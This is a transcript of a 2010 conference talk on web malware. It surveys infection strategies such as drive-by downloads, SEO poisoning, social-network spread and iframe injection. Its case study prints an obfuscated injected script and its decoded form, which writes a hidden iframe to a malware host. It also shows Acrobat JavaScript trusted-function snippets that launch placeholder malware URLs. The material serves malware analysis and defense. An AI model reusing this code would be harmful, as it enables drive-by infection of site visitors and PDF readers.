scaling web 2.0 malware infection
Post on 19-Oct-2014
2.908 views
DESCRIPTION
Given at TRISC 2010, Grapevine, Texas.http://www.trisc.org/speakers/aditya_sood/#pThe talk sheds light on the new trends of web based malware. Technology and Insecurity goes hand in hand. With the advent of new attacks and techniques the distribution of malware through web has been increased tremendously. Browser based exploits mainly Internet Explorer have given a birth to new world of malware infection. The attackers spread malware elegantly by exploiting the vulnerabilities and drive by downloads. The infection strategies opted by attackers like malware distribution through IFRAME injections and Search Engine Optimization. In order to understand the intrinsic behavior of these web based malware a typical analysis is required to understand the logic concept working behind these web based malwares. It is necessary to dissect these malwares from bottom to top in order to control the devastating behavior. The talk will cover structured methodologies and demonstrate the static, dynamic and behavioral analysis of web malware including PCAP analytics. Demonstrations will prove the fact and necessity of web malware analysis.TRANSCRIPT
Scaling Web 2.0 Malware Infection______________________________________
Aditya K Sood, Sr. Security Practitioner
Armorize , Santa Clara US
Disclaimer
All contents of this presentation represent my own beliefs and views and do not, unless
explicitly stated otherwise, represent the beliefs of my current, or any of my previous in
that effect, employers.
About Me - $whoami
• Senior Security Practitioner , Armorize
http://www.armorize.com
• Founder , SECNICHE Security.
http://www.secniche.org
• Worked previously for COSEINC as Senior Security Researcher and Security
Consultant for KPMG
• Written content Author for HITB E-Zine, Hakin9 ,ELSEVIER, USENIX Journals.
• Like to do Bug Hunting and Malware dissection.
• Released Advisories to Forefront Companies.
• Active Speaker at Security Conferences including RSA etc.
Agenda
Understanding The Malware Anatomy
The Vertical Risk – Malware Impact on Business
Top 10+ Web Malware Infection Strategies
2X Generation - Century Malware Trickeries
Case Study – Infection through PDF Trusted Functions
Demonstration
Pattern
Understanding The Malware Anatomy
The Dependent Peripherals
Malware Mess – Global Trifecta
Malware Infection Rate
Malware Retrospective and Classification
Trojan (31.2 %)
Downloader (25.6 %)
Backdoor (13.8 %)
Spyware (13.2 %)
Adware (4.9%)
Top 5 Malware Categories Top 5 Virus Families
Stuh (4.4 %)
Fraudload (3.9 %)
Monder (3.6 %)
Autorun (2.7 %)
Buzus (2.7 %)
Interdependency
Malware - The Impact on Real World
Malware Trends – The Attack Base
Financial abuse and mass identity theft
The mass destructor – Botnet infection and zombie hosts
Exploiting the link dependency – Pay Per click hijacking
Traffic manipulation – Open redirect vulnerabilities at large scale
Spywares , crypto virology , ransom ware etc
Distributed Denial of Service – The service death game , extortion
Industry change semantics – Malware activation change line
Infection through browsers and portable gadgets – the biggest step
Exploiting anti virus loopholes
Malware Contributing Issues – Rising Steps
Publicly available malware source code
Malware distribution framework such MPACK , NeoSploit etc.
Unpatched vulnerabilities and loosely coupled patches
Demand of underground services and self exposure
Global surveillance mode and information stealing in the wild
Software discrepancies and inherited design flaws such as Browsers.
Exploitation at web level is easy. It opens a door to System Level Fallacies.
Inappropriate security solutions deployed and irrelevant security paradigm
Botnet Infection – The easy way to launch diversified attack
Web sharing and centralized work functionality.
Pattern
Understanding The Vertical Risk
Web Delivered Malware Impact on Business
Underground Market and Malware Flow Model
Underground Malware Market Business - Statistics
© GDATA
Practical Malware Flow Model
© Reihe Informatik. TR-2007-011
Malware Writers Role
Flow of Malware Websites
Malware - The Impact on Real World
Pattern
Malware – Sources of Infection
Web 2.0
Top 10 + Strategies of Distributing Malware through Web
Long Live Drive By Download – Base Web Malware Tactic
(SEO) Poisoning – Driven with Malware
Messengers – Infection at Instant State
Networking Websites – TWITTER Malware Infection
Exploiting the trust relationship on Social Networking Websites
Spreading malware content through Tweets , Scrapping etc
Chain Reaction – Dwells very fast in Website Networks (URL Shortening Trick)
Social Networking – FACEBOOK Malware Applications
Manipulating the Open API Calls
User centric control
Exploiting the design fallacies
Social Networking – FACEBOOK MAIL Infection
Step 1
Step 2
Step 3
Online Media Content – You Tube, Google Videos etc !!
Exploiting the Web of Trust – Human Touch
Spywares , Ransom Wares and other Variants etc.
Insidious Spamming – Email , Blogs , Redirectors etc
Botnets – Malware Infection at Large Scale
Direct Malware Hosting – Infected Web Domains
System Stringency – Exploiting the Exceptions
Malware Kits – Automated Infection
Case Study – Safety Labs Malware Infection
Malware Infecting the Security Service Provider Websites.
____________________________________________________________
It is unfortunate that even the Security Solution Provider is also touched by the latest Internet IFRAME
threats or rather say infections
Thousands of websites on internet have been compromised with malicious Iframes which load exploit
code designed to silently install trojans onto susceptible victim computers.
Case Study – Safety Labs Malware Infection
Case Study – Safety Labs Malware Infection
OBFUSCATED JAVASCRIPT
<SCRIPT LANGUAGE=JAVASCRIPT>
FUNCTION MDBAN(X){VAR L=X.LENGTH,B=1024,I,J,R,P=0,S=0,W=0,T=ARRAY(63,9,52,47,48,11,7,35,
59,56,0,0,0,0,0,0,43,14,20,5,61,19,54,36,15,30,32,38,22,44,29,28,12,2,55,45,51,62,25,13,27,3,17,0,0,0,0,16,0,34,
0,58,40,31,60
,49,8,50,4,21,53,1,10,33,41,23,24,37,18,26,57,6,39,46,42);FOR(J=MATH.CEIL(L/B);J>0;J--
){R='';FOR(I=MATH.MIN(L,B);I>0;I--,L--){{W
|=(T[X.CHARCODEAT(P++)-48])<<S;IF(S){R+=STRING.FROMCHARCODE(221^W&255);W>>=8;S-
=2}ELSE{S=6}}}EVAL(R);}}MDBAN('ZT8M
VN@ZT8UZFKNZYQYUVN8M9Z3VVN@3DQ5YTKCFZUNSPAXDC6AS8UN34AX0TI5M9
QAC0LUYD8C@UQU0LKUZSIYFI8I@2Z@@TE8M8N@FPN39CXHGFKUST0ZMDAXYLY13PL8F3I8MVN5ML
E0DMXICGRAD
F@HC0LUYCX3U0R3Z2KXZLQY830I0LA5SCLXZJXACD8UZGW5YJ0EY2CU@GI5PXH@MTA8076YF2Y8@FQ5
Y7@HD')</SCRIPT><!-- 213.219.250.100 -->
Script Source is
http://www.safety-lab.com/audits/categorylist.pl?lang=en
Case Study – Safety Labs Malware Infection
DEOBFUSCATED JAVASCRIPT
(1) DECODED JAVASCRIPT EVALS()
WINDOW.STATUS = 'DONE';
DOCUMENT.WRITE('<IFRAME NAME=5B8F SRC="HTTP://3PIGS.INFO/T/?' + MATH.ROUND(MATH.RANDOM() *
14490) + '5B8F' + '" WIDTH=322 HEIGHT=45 STYLE="DISPLAY:NONE"></IFRAME>')
(2) DECODED JAVASCRIPT WRITES RESULT
<IFRAME NAME=5B8F SRC="HTTP://3PIGS.INFO/T/?58965B8F" WIDTH=322 HEIGHT=45 STYLE="DISPLAY:NONE">
</IFRAME>
HTTP://3PIGS.INFO/T/?58965B8F “ was
injected as source for malicious file.
Complexity factor is always high in decoding the malicious JavaScript.
2X Generation Malware Trickeries
System File Patching and Code Injection
Code Interdependency – Malware Adjacency - Code Resuscitation.
Code Randomization, Obfuscation and Morphing
Rootkits and System Cloaking
Exploiting Active X and JavaScript Heaps – Direct Control
Private & Confidential Property of Armorize
Escaping What !
Malware Analysis Methodology (MAM) - Overview
End Point Communication Connection state check
Server identity checks through communication medium.
Error generation like Checksum Integrity.
Encrypted data in packets.
Protocol Switching.
Session Stream Analysis – Deep Inspection
Analyzing TCP stream session
Extracting an executable from the raw data
Behavioral Analysis – Scrutinizing system fallacies Active debugging
Black Box Testing approach
Static Analysis – Reversing the facets of malwareIts all about analyzing the code of Malware
Case Study – Malware Infection
PDF Trusted Functions
(Understanding the Facets of Malware)
Some PDF Truths
Hyperlink execution notification as alerts
Data is not allowed to be stored in the forms
http://secniche.org/papers/SNS_09_03_PDF_Silent_Form_Re_Purp_Attack.pdf
Number of vulnerable functions have been removed i.e. from registered state
Support for Adobe reader 7.xx has been removed
http://blogs.adobe.com/adobereader/2009/12/adobe_reader_and_acrobat_versi.html
Other alerts have been structured as security checks in standalone PDF’s
ACRO JS does not support DOM as normal JavaScript does.
Adobe has inbuilt functionality to provide a code wrappers which calls restricted functions in
specific environments. For example:- In general, it is not possible to generate another PDF
from the standalone PDF when it is opened
Understanding Malware Infection - PDF
Exploiting the browser – Downloading files through Windows Media Player
Exploiting the Global Access of JavaScript folder in PDF
Hidden gift.js file containing malicious code is placed here
Understanding Malware Infection - PDF
Calling Codes through Trusted Functions
Trusted function body calls the app.beginPriv (begin privileges) and app.endPriv(end
privileges) to enclose any type of function and code to be trusted.
The trusted functions method can be called successfully on the initialization of the
application and it is possible to call certain number of restricted functions through it.
myTrustedFunction = app.trustedFunction(
function() { <function body> } );
New Scareware Message – Opening a new PDF
trustedDoc = app.trustedFunction( function (width,height)
{ app.beginPriv();
var trustDoc = app.newDoc(width,height);
trustDoc.addWatermarkFromText("X JERKED X");
app.endPriv();
return trustDoc; })
trustedDoc(300,300);
Understanding Malware Infection - PDF
Calling Codes through Trusted Propagator Functions
myPropagatorFunction = app.trustPropagatorFunction(
function() { <function body> }
URL Opening - Drive by Download Infections
trustedDoc = app.trustedFunction
(
function (cURL, bNewFrame)
{
app.beginPriv();
var trustedDoc = app.launchURL(cURL, bNewFrame);
app.endPriv();
return trustedDoc;
}
)
trustedDoc("http://www.malware1.com",true);
trustedDoc("http://www.malware2.com",true);
trustedDoc("http://www.malware3.com",true);
trustedDoc("http://www.malware4.com",true);
trustedDoc("http://www.malware5.com",true);
Understanding Malware Infection - PDF
Demonstration
Questions and Queries
Thanks and Regards
Special thanks to Armorize for pushing me to do more research.
http://www.armorize.com
__________________________________________________________________________________
Portal and Blog
SecNiche Security – http://www.secniche.org | http://zeroknock.blogspot.com
(Screenshots shared from various resources)